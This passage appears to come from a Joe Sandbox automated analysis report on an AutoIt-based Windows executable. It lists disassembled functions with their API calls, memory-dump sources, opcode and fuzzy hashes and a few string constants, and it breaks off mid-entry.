                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                              • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                              • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                              • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                              Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                              • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                              • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                              • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                              Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                              • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                              • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                              • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                              Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                              • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                              • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                              • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                              Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                              • MessageBeep.USER32(00000000), ref: 0045C226
                                                                              • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                              • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                              • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                              • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                              • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                              Function 02F53171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 02F53189
                                                                                • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
                                                                                • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
                                                                              • _free.LIBCMT ref: 02F5319B
                                                                              • _free.LIBCMT ref: 02F531AD
                                                                              • _free.LIBCMT ref: 02F531BF
                                                                              • _free.LIBCMT ref: 02F531D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: d103b84a37de3adc06759aa77a2895e9932919528f85362bf704e6912952ffc5
                                                                              • Instruction ID: 91d0996209331f89937ea2410f90f279a10b2958217e96a3811f10f9d5da0ff3
                                                                              • Opcode Fuzzy Hash: d103b84a37de3adc06759aa77a2895e9932919528f85362bf704e6912952ffc5
                                                                              • Instruction Fuzzy Hash: 84F06232D41224AB9630DE78F984C16B3DABE017D4B640C49FF09D7604CF30F8808B60
                                                                              Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 004013BF
                                                                              • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                              • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                              • DeleteObject.GDI32 ref: 00401401
                                                                              • StrokePath.GDI32(?), ref: 0040141C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                              • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                              • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                              • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                              Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                              • __swprintf.LIBCMT ref: 00412ECD
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 1943609520-557222456
                                                                              • Opcode ID: a75d18cbb81ebfd378ae05468e5ff70791e623048ba67e4482aec485e8df0e21
                                                                              • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                              • Opcode Fuzzy Hash: a75d18cbb81ebfd378ae05468e5ff70791e623048ba67e4482aec485e8df0e21
                                                                              • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                              Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container$%I
                                                                              • API String ID: 3565006973-4251005282
                                                                              • Opcode ID: acedc331a202e6bdf9e59912930d66ea5739f8d7afa743188be3a36c8fc2de77
                                                                              • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                              • Opcode Fuzzy Hash: acedc331a202e6bdf9e59912930d66ea5739f8d7afa743188be3a36c8fc2de77
                                                                              • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                              Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                              • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                              • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                              • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                              Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: 3cA$_A
                                                                              • API String ID: 4104443479-3480954128
                                                                              • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                              • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                              • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                              • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                              Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                              • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                              • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                              • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                              Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                              • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                              • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                              • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                              Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __calloc_crt
                                                                              • String ID: K$@BL
                                                                              • API String ID: 3494438863-2209178351
                                                                              • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                              • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                              • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                              • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                              Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
